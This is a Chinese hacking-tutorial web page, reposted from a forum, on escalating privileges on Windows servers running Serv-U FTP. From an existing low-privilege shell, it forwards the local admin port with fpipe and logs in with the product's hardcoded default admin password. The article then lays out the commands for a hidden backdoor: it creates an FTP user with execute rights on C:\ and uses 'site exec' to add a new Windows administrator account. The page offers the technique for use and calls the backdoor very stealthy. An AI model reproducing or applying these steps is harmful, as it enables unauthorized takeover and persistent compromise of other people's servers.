| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

安全防范

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·双网卡共享上网解析
·常用端口对照详解
·技巧:多种途径访问局域网中的计算机
·代理服务器使用祥解
·在家远程控制公司的局域网电脑
·在Windows XP****享上网
·最新奇迹****复制漏洞大全(含98c)
·为什么局域网中机器PING通却不能上网?
·局域网共享资源安全防护大全
·远程破OICQ密码给工具QQExplorer ver 1.25介绍

站内搜索

利用SERV-U后门做个后门
前几天在灰色轨迹上看到呢SERV-U下提升权限的一种新的方法~

以下转自:19800729
[serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个
版本中是固定的,也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了]




这种方法我在本地测试呢一下发现效果非常的好~!

转念一想,可以用他做个后门

方法同上

在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:#l@$ak#.lk;0@P

连上后,先建一个用户 目录指向c:\ 给他执行权限

使用方法

cmd

ftp 192.168.0.1
username
password
ftp>cd /winnt/system32
ftp>quote site exec net.exe user axin 1234 /add
ftp>quote site exec net.exe localgroup administrators axin /add

一个非常隐蔽的后门做成了




相关文章
  • 浅析2004年出现的4种新后门技术
  • 独裁者后门的手工清除
  • 黑客后门:asp木马配合servu取管理权限
  • 网络“后门”-端口的故事⑨
  • 超小的简单渗透asp后门.asp
  • 脚本图片类后门的完美使用方法实现
  • Ddos独裁者里的后门
  • 建造永不被杀的80端口后门
  • 系统后门的真面目<一>
  • 系统后门的真面目<二>
  • Win2000/XP中的自启动“后门”
  • 关上可恶的后门-消除NetBIOS隐患
  • 网络世界的“后门”-端口的故事⑨
  • 建造永不被杀的80端口后门
  • 相关软件


    下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图